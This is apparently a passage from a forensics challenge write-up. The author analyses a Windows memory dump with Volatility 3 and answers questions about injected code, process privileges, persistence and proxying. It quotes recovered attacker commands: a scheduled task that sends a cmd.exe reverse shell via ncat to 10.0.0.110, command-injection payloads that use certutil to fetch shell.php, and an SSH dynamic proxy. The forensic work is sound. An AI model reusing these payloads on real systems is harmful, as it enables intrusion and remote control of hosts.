00 00 00 48 b8 10 e8 16 ...H....
4c f8 7f 00 00 ff e0 49 L......I
c7 c2 01 00 00 00 48 b8 ......H.
10 e8 16 4c f8 7f 00 00 ...L....
ff e0 49 c7 c2 02 00 00 ..I.....
0x7df4d16b0000: add byte ptr [rax], al
...
This information is helpful. When we initially looked at process tree, the vmtoolsd.exe process at PID 7164, there was a concern as to why this process spawned multiple cmd.exe
With this in place, time for the questions
Q: Which of your suspicious processes seems to have malware injected or hidden code in user mode memory?
A: We seem to be making progress at this point. Our initial analysis showed concern about vmtoolsd.exe with PID 7164 spawning multiple cmd.exe.
Similarly, we see powershell.exe with PID 4852, spawned by Windows Terminal as having malware. Initially, I did not have a concern about this but now I do.
Revisiting these processes. At this point, suspicion can be pointed to both parent and child.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '7164|4852|2460'
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A
For now, let's stay focused on the vmtoolsd.exe with PID 7164 and the PowerShell with PID 4852. We can't investigate everything, so let's prioritize and focus on these two for now.
With suspicious code found, let's dump these out.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind --pid 7164 4852 --dump
Verifying the created files
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls pid.* -l
-rw------- 1 kali kali 65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp
Interesting, passing these files through ClamAV did not produce any signs of maliciousness.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ clamscan pid.*
Loading: 17s, ETA: 0s [========================>] 8.68M/8.68M sigs
Compiling: 4s, ETA: 0s [========================>] 41/41 tasks
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp: OK
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp: OK
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp: OK
----------- SCAN SUMMARY -----------
Known viruses: 8679505
Engine version: 1.0.1
Scanned directories: 0
Scanned files: 3
Infected files: 0
Data scanned: 0.52 MB
Data read: 0.45 MB (ratio 1.16:1)
Time: 23.106 sec (0 m 23 s)
Start Date: 2023:11:24 11:43:10
End Date: 2023:11:24 11:43:33
Interesting! Nothing marked as suspicious.
At this point, we should have identified potential malware has been injected in two one or more processes.
Q: What is the permission on the memory regions?
A: PAGE_EXECUTE_READWRITE permissions
Q: How many memory regions reported as having injected code based on your suspicious PIDs
A: 3
Q: What is the size of the memory regions which contains the memory.
A: 204800 and 65536
There are 3 memory regions all with PAGE_EXECUTE_READWRITE permissions.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls pid.* -l
-rw------- 1 kali kali 65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp
Since no concerns were raised let's look at this from a different perspective. Let's dump files for these processes.
First create a directory
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$mkdir pid 7164
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir 4852
Taking a snapshot view of the extracted files:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 7164/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 7164
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf4c4b390 mfc140enu.dll file.0xe78bf4c4b390.0xe78bf4724af0.ImageSectionObject.mfc140enu.dll.img
DataSectionObject 0xe78bf448f8b0 oleaccrc.dll file.0xe78bf448f8b0.0xe78bf43a04f0.DataSectionObject.oleaccrc.dll.dat
DataSectionObject 0xe78bf352b300 cversions.2.db file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat
DataSectionObject 0xe78bf352b300 cversions.2.db file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat
DataSectionObject 0xe78bf5512d10 msxml3r.dll file.0xe78bf5512d10.0xe78bf4f4d0b0.DataSectionObject.msxml3r.dll.dat
DataSectionObject 0xe78bf2f8d770 crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat
DataSectionObject 0xe78bf3529a00 msxml6r.dll file.0xe78bf3529a00.0xe78bf3a0d360.DataSectionObject.msxml6r.dll.dat
..............
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 4852 | more
Volatility 3 Framework 2.5.2 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf37c5b80 winnlsres.dll file.0xe78bf37c5b80.0xe78bf3a0d720.DataSectionObject.winnlsres.dll.dat
DataSectionObject 0xe78bf37c5ea0 winnlsres.dll.mui file.0xe78bf37c5ea0.0xe78bf3a0d0e0.DataSectionObject.winnlsres.dll.mui.dat
DataSectionObject 0xe78bf2f8d770 crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat
ImageSectionObject 0xe78bf3fe36a0 System.Numerics.dll file.0xe78bf3fe36a0.0xe78bf0fd2210.ImageSectionObject.System.Numerics.dll.img
ImageSectionObject 0xe78bf5523b60 Microsoft.PowerShell.PSReadLine.dll file.0xe78bf5523b60.0xe78bf2ed1d00.ImageSectionObject.Microsoft.PowerShe
ll.PSReadLine.dll.img
...........................
Run all of these files through ClamAV. But first ensure ClamAV is up-to-date.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ sudo freshclam --show-progress
Thu Dec 14 10:13:04 2023 -> ClamAV update process started at Thu Dec 14 10:13:04 2023
Thu Dec 14 10:13:04 2023 -> daily.cld database is up-to-date (version: 27123, sigs: 2048780, f-level: 90, builder: raynman)
Thu Dec 14 10:13:04 2023 -> main.cvd database is up-to-date (version: 62, sigs: 6647427, f-level: 90, builder: sigmgr)
Thu Dec 14 10:13:04 2023 -> bytecode.cvd database is up-to-date (version: 334, sigs: 91, f-level: 90, builder: anvilleg)
Now scan the files again.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ clamscan 7164/* 4852/*
Loading: 18s, ETA: 0s [========================>] 8.68M/8.68M sigs
Compiling: 3s, ETA: 0s [========================>] 41/41 tasks
....
----------- SCAN SUMMARY -----------
Known viruses: 8680656
Engine version: 1.0.3
Scanned directories: 0
Scanned files: 232
Infected files: 0
Data scanned: 263.46 MB
Data read: 297.22 MB (ratio 0.89:1)
Time: 246.675 sec (4 m 6 s)
Start Date: 2023:12:14 10:14:36
End Date: 2023:12:14 10:18:43
Well isn't this depressing!! Nothing being reported as suspicious. While depressing, it is not surprising. If we go back above, we see Microsoft Defender was the EDR producing running at the time of this capture. We could assume if these files were seen as malicious by Defender, it would have acted on them. At this point because of high suspicion, I would still take this device offline as while the security tools have not validated "maliciousness", I have enough evidence to make a decision. This device 10.0.0.108 and the neighboring devices at 10.0.0.101 and 10.0.0.110 should be taken offline. The map previously seen in the network statistics section shows there are established connections with these hosts.
Q: What privileges is the VMWare process at PID 7164 running with?
A: Get the privileges these vmtoolsd.exe with PID 7164 is running with
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ /volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 7164
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process Value Privilege Attributes Description
7164 vmtoolsd.exe 2 SeCreateTokenPrivilege Create a token object
7164 vmtoolsd.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token
7164 vmtoolsd.exe 4 SeLockMemoryPrivilege Lock pages in memory
7164 vmtoolsd.exe 5 SeIncreaseQuotaPrivilege Increase quotas
7164 vmtoolsd.exe 6 SeMachineAccountPrivilege Add workstations to the domain
7164 vmtoolsd.exe 7 SeTcbPrivilege Act as part of the operating system
7164 vmtoolsd.exe 8 SeSecurityPrivilege Manage auditing and security log
7164 vmtoolsd.exe 9 SeTakeOwnershipPrivilege Take ownership of files/objects
7164 vmtoolsd.exe 10 SeLoadDriverPrivilege Load and unload device drivers
7164 vmtoolsd.exe 11 SeSystemProfilePrivilege Profile system performance
7164 vmtoolsd.exe 12 SeSystemtimePrivilege Change the system time
7164 vmtoolsd.exe 13 SeProfileSingleProcessPrivilege Profile a single process
7164 vmtoolsd.exe 14 SeIncreaseBasePriorityPrivilege Increase scheduling priority
7164 vmtoolsd.exe 15 SeCreatePagefilePrivilege Create a pagefile
7164 vmtoolsd.exe 16 SeCreatePermanentPrivilege Create permanent shared objects
7164 vmtoolsd.exe 17 SeBackupPrivilege Backup files and directories
7164 vmtoolsd.exe 18 SeRestorePrivilege Restore files and directories
7164 vmtoolsd.exe 19 SeShutdownPrivilege Present Shut down the system
7164 vmtoolsd.exe 20 SeDebugPrivilege Debug programs
7164 vmtoolsd.exe 21 SeAuditPrivilege Generate security audits
7164 vmtoolsd.exe 22 SeSystemEnvironmentPrivilege Edit firmware environment values
7164 vmtoolsd.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
7164 vmtoolsd.exe 24 SeRemoteShutdownPrivilege Force shutdown from a remote system
7164 vmtoolsd.exe 25 SeUndockPrivilege Present Remove computer from docking station
7164 vmtoolsd.exe 26 SeSyncAgentPrivilege Synch directory service data
7164 vmtoolsd.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation
7164 vmtoolsd.exe 28 SeManageVolumePrivilege Manage the files on a volume
7164 vmtoolsd.exe 29 SeImpersonatePrivilege Impersonate a client after authentication
7164 vmtoolsd.exe 30 SeCreateGlobalPrivilege Default Create global objects
7164 vmtoolsd.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller
7164 vmtoolsd.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object
7164 vmtoolsd.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications
7164 vmtoolsd.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock
7164 vmtoolsd.exe 35 SeCreateSymbolicLinkPrivilege Required to create a symbolic link
7164 vmtoolsd.exe 36 SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session.
Q: What privileges is the PowerShell process at 4852 running with?
A: Looking at the PowerShell process at 4852 also:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 4852 | sed '1,4d'
4852 powershell.exe 2 SeCreateTokenPrivilege Create a token object
4852 powershell.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token
4852 powershell.exe 4 SeLockMemoryPrivilege Lock pages in memory
4852 powershell.exe 5 SeIncreaseQuotaPrivilege Present Increase quotas
4852 powershell.exe 6 SeMachineAccountPrivilege Add workstations to the domain
4852 powershell.exe 7 SeTcbPrivilege Act as part of the operating system
4852 powershell.exe 8 SeSecurityPrivilege Present Manage auditing and security log
4852 powershell.exe 9 SeTakeOwnershipPrivilege Present Take ownership of files/objects
4852 powershell.exe 10 SeLoadDriverPrivilege Present Load and unload device drivers
4852 powershell.exe 11 SeSystemProfilePrivilege Present Profile system performance
4852 powershell.exe 12 SeSystemtimePrivilege Present Change the system time
4852 powershell.exe 13 SeProfileSingleProcessPrivilege Present Profile a single process
4852 powershell.exe 14 SeIncreaseBasePriorityPrivilege Present Increase scheduling priority
4852 powershell.exe 15 SeCreatePagefilePrivilege Present Create a pagefile
4852 powershell.exe 16 SeCreatePermanentPrivilege Create permanent shared objects
4852 powershell.exe 17 SeBackupPrivilege Present Backup files and directories
4852 powershell.exe 18 SeRestorePrivilege Present Restore files and directories
4852 powershell.exe 19 SeShutdownPrivilege Present Shut down the system
4852 powershell.exe 20 SeDebugPrivilege Present,Enabled Debug programs
4852 powershell.exe 21 SeAuditPrivilege Generate security audits
4852 powershell.exe 22 SeSystemEnvironmentPrivilege Present Edit firmware environment values
4852 powershell.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4852 powershell.exe 24 SeRemoteShutdownPrivilege Present Force shutdown from a remote system
4852 powershell.exe 25 SeUndockPrivilege Present Remove computer from docking station
4852 powershell.exe 26 SeSyncAgentPrivilege Synch directory service data
4852 powershell.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation
4852 powershell.exe 28 SeManageVolumePrivilege Present Manage the files on a volume
4852 powershell.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication
4852 powershell.exe 30 SeCreateGlobalPrivilege Present,Enabled,Default Create global objects
4852 powershell.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller
4852 powershell.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object
4852 powershell.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications
4852 powershell.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock
4852 powershell.exe 35 SeCreateSymbolicLinkPrivilege Present Required to create a symbolic link
4852 powershell.exe 36 SeDelegateSessionUserImpersonatePrivilege Present Obtain an impersonation token for another user in the same session.
Q: How many privileges are these two processes running with?
A: The process at PID 7164 and PID 4852 are both running with 35 privileges.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 7164 | sed '1,4d' | wc --lines
35
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 4852 | sed '1,4d' | wc --lines
35
Looking at the SIDS, the process was running as:
Q: What SIDs is the VMware process at 7164 running with?
A: vmtoolsd.exe at 7164 is running with the following SIDs
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids.GetSIDs --pid 7164
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
7164 vmtoolsd.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
7164 vmtoolsd.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
7164 vmtoolsd.exe S-1-1-0 Everyone
7164 vmtoolsd.exe S-1-5-114 Local Account (Member of Administrators)
7164 vmtoolsd.exe S-1-5-32-544 Administrators
7164 vmtoolsd.exe S-1-5-32-545 Users
7164 vmtoolsd.exe S-1-5-4 Interactive
7164 vmtoolsd.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
7164 vmtoolsd.exe S-1-5-11 Authenticated Users
7164 vmtoolsd.exe S-1-5-15 This Organization
7164 vmtoolsd.exe S-1-5-113 Local Account
7164 vmtoolsd.exe S-1-5-5-0-1032752 Logon Session
7164 vmtoolsd.exe S-1-2-0 Local (Users with the ability to log in locally)
7164 vmtoolsd.exe S-1-5-64-10 NTLM Authentication
7164 vmtoolsd.exe S-1-16-8192 Medium Mandatory Level
Q: What SIDs is the PowerShell process at 4852 running with?
A: PowerShell at 4852 is running with the following SIDs
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids.GetSIDs --pid 4852
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
4852 powershell.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
4852 powershell.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
4852 powershell.exe S-1-1-0 Everyone
4852 powershell.exe S-1-5-114 Local Account (Member of Administrators)
4852 powershell.exe S-1-5-32-544 Administrators
4852 powershell.exe S-1-5-32-545 Users
4852 powershell.exe S-1-5-4 Interactive
4852 powershell.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
4852 powershell.exe S-1-5-11 Authenticated Users
4852 powershell.exe S-1-5-15 This Organization
4852 powershell.exe S-1-5-113 Local Account
4852 powershell.exe S-1-5-5-0-1032752 Logon Session
4852 powershell.exe S-1-2-0 Local (Users with the ability to log in locally)
4852 powershell.exe S-1-5-64-10 NTLM Authentication
4852 powershell.exe S-1-16-12288 High Mandatory Level
Very disappointed that I still do not have enough concrete evidence to sell my case. However, there is still enough to take action. At this point, let's move forward with the challenge questions. We will find more evidence as we move along.
Q: What "Integrity Level" is this powershell.exe process at PID 4852 running with?
A: PowerShell at 4852 is running with "High Mandatory Level"
Q: What "Integrity Level" is the VMWare process at PID 7164 running with?
A: VMWare process at 7164 is running with "Medium Mandatory Level"
Looking for persistence.
Starting with the Registry Hives:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.registry.hivelist.HiveList> hivelist.txt
Progress: 100.00 PDB scanning finished
Q How many entries were returned for the registry hive list?
A: 42. Remember the lines at the top of the file needs to be removed:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat hivelist.txt | sed '1,4d' | wc --lines
42
Q: How many programs seems to be configured to start when the user computer starts up and the user logs in?
A: Looking at the run key it seems to be 1.
Q: What is the name of the program configured to start at login?
A: It seems oneDriveSetup.exe is the only program configured to start at login.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows\CurrentVersion\Run"
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Last Write Time Hive Offset Type Key Name Data Volatile
...
2023-07-12 04:42:30.000000 0xb98420e97000 REG_SZ \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run OneDriveSetup "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup" False
2023-07-12 04:42:29.000000 0xb98421072000 REG_SZ \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run OneDriveSetup "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup" False
Continuing this hunt for persistence.
Above, we saw ncat.exe is being used answer the follow questions:
Q: What is the full path is ncat.exe being run form?
A: 'c:\Program Files (x86)\Nmap\ncat.exe'
Q: is ncat.exe using a "normal user" prompt or an "Administrator" prompt?
A: "Administrator"
Q: What is the full command line of the ncat.exe being used to establish persistence?
A: schtasks /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f
Q: Which Windows utility is being used to establish this persistence?
A: schtasks.exe
All of these questions can be answered from below.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "ncat" | sort --unique | grep 'schtask'
]0;Administrator: Command Prompt - schtasks /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f
Q: What is the objective of this persistence mechanism?
A: This schedule task is set to send this host command prompt via SSL to the host at 10.0.0.110 on port 443 at 2 AM Daily.
IP 10.0.0.110 seems to be a prominent fixture through this incident. Even further evidence that we should be concerned about this host.
Extract all ASCII Strings.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings SECURITYNIK-WIN-20231116-235706.dmp > strings.txt
Not to worry, I know I should look at the other encodings also via "--encoding=[s|S|b|l|B|L]". However, this is the approach I am taking for this challenge.
There seems to be some interaction with the "upload" folder.
Q: What is the name of the file uploaded?
A: The uploaded file is "shell.php"
Q: What is the tool used to allow the threat actor to live off the land to "upload" one or more files?
A: Tool used to live off the land is "certutil.exe"
Q: What type of vulnerability does it seem the threat actor was able to leverage?
A: The vulnerability is command injection
Q: What is the full command that was used to exploit this vulnerability?
A: See below for all the additional information.
Below also answers all the questions above.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep "10.0.0.110" strings.txt | grep certutil
.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=SubmitP
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
cmd.exe /s /c "ping 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ."
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit_
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit"M{
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.phppload%5Cshell.php+.&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit
Looking at the "DeviceType"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.devicetree.DeviceTree > devicetree.txt
Progress: 100.00 PDB scanning finished
Q: How many unique device types are seen within the memory dump?
A: 30 unique devices
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d' | wc --lines
30
While above reports 30, the answer is 29 because there is a line in the middle that is empty with "2".
Q: What is/are the name(s) of the devices?
A: See below
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d'
48 FILE_DEVICE_UNKNOWN
21 FILE_DEVICE_DISK
19 FILE_DEVICE_NETWORK
18 UNKNOWN
12 FILE_DEVICE_BUS_EXTENDER
9 FILE_DEVICE_MOUSE
9 FILE_DEVICE_DISK_FILE_SYSTEM
9 FILE_DEVICE_CONTROLLER
7 FILE_DEVICE_NETWORK_FILE_SYSTEM
5 FILE_DEVICE_KS
3 FILE_DEVICE_VIDEO
3 FILE_DEVICE_NAMED_PIPE
3 FILE_DEVICE_CD_ROM
2 FILE_DEVICE_NULL
2 FILE_DEVICE_MAILSLOT
2 FILE_DEVICE_ACPI
2
1 FILE_DEVICE_TRANSPORT
1 FILE_DEVICE_TAPE_FILE_SYSTEM
1 FILE_DEVICE_SOUND
1 FILE_DEVICE_SERIAL_PORT
1 FILE_DEVICE_SCREEN
1 FILE_DEVICE_PHYSICAL_NETCARD
1 FILE_DEVICE_NETWORK_BROWSER
1 FILE_DEVICE_KSEC
1 FILE_DEVICE_KEYBOARD
1 FILE_DEVICE_CD_ROM_FILE_SYSTEM
1 FILE_DEVICE_BEEP
1 FILE_DEVICE_BATTERY
1 FILE_DEVICE_8042_PORT
Q: From the device tree how many have a "DeviceName" of HTTP and a "DriverNameofAttDevice" of "ClientSession"?
A: There is only 1 HTTP "ClientSession"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | grep --perl-regexp 'HTTP|ClientSession'
0xe78beff21e50 DRV HTTP N/A N/A N/A
* 0xe78beff21e50 DEV HTTP ClientSession N/A FILE_DEVICE_NETWORK
In the list of ESTABLISHED network sessions, we also saw there is a SSH connection:
Q: What does the SSH manpage say about "-D"?
A: If we look at the SSH Manpage, we see -D [bind_address:]port.
This means we can specify an IP address with the port. Since we already know the port we can assume at a minimum it is listening on 127.0.0.1. Let's test that theory.
Q: What is the full path(s) of the SSH "known_hosts" file on this system:
A:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "known_hosts" | sort --unique
4known_hosts (C:\Users\administrator.SECURITYNIK-WIN\.ssh)
4known_hosts (C:\Users\securitynik\.ssh)
*!C:\Users\administrator.SECURITYNIK-WIN\.ssh\known_hosts.old
!C:\Users\securitynik\.ssh\known_hosts
C:\Users\securitynik/.ssh/known_hosts
C:\Users\securitynik/.ssh/known_hosts2
!C:\Users\securitynik\.ssh\known_hosts.old
We can also see that it seems SSH was being used as a local "dynamic" proxy.
We learned this above, so this is just reinforcement of our knowledge.
This could be used for relaying/proxying communication.
Q: What is the command line, local port, username and remote IP address that SSH proxy connection is using?
A:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'ssh\s+\-D'
ssh -D 9999 kali@10.0.0.110 -N -vvv
]0;Administrator: Windows PowerShell - ssh -D 9999 kali@10.0.0.110 -N -vvv
Q: What does the "-N" do in the identified command?
A: "Do not execute a remote command. This is useful for just forwarding ports"
Q: Is the PowerShell prompt running as a "normal user" or "Administrator" ?
A: "Administrator"
Q: What is the application that seems to be connecting to the local "dynamic" proxy?
A: chrome.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "chrome" | grep "127.0.0.1:9999"
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --proxy-server=socks5://127.0.0.1:9999 --mojo-platform-channel-handle=2144 --field-trial-handle=1868,i,3512365481249750963,10747349760151142710,262144 /prefetch:8
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
Staying a bit on this port 9999 traffic. What else is going on there.
At the same time, we saw port 443 earlier. Let's see what we can find for these two ports
Q: What was/were the name of the file(s) downloaded from http://10.0.0.108:9999?
A: Looks like putty_64.exe, putty_x64.exe, putty.exe and putty_x64.md5.txt were all downloaded
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
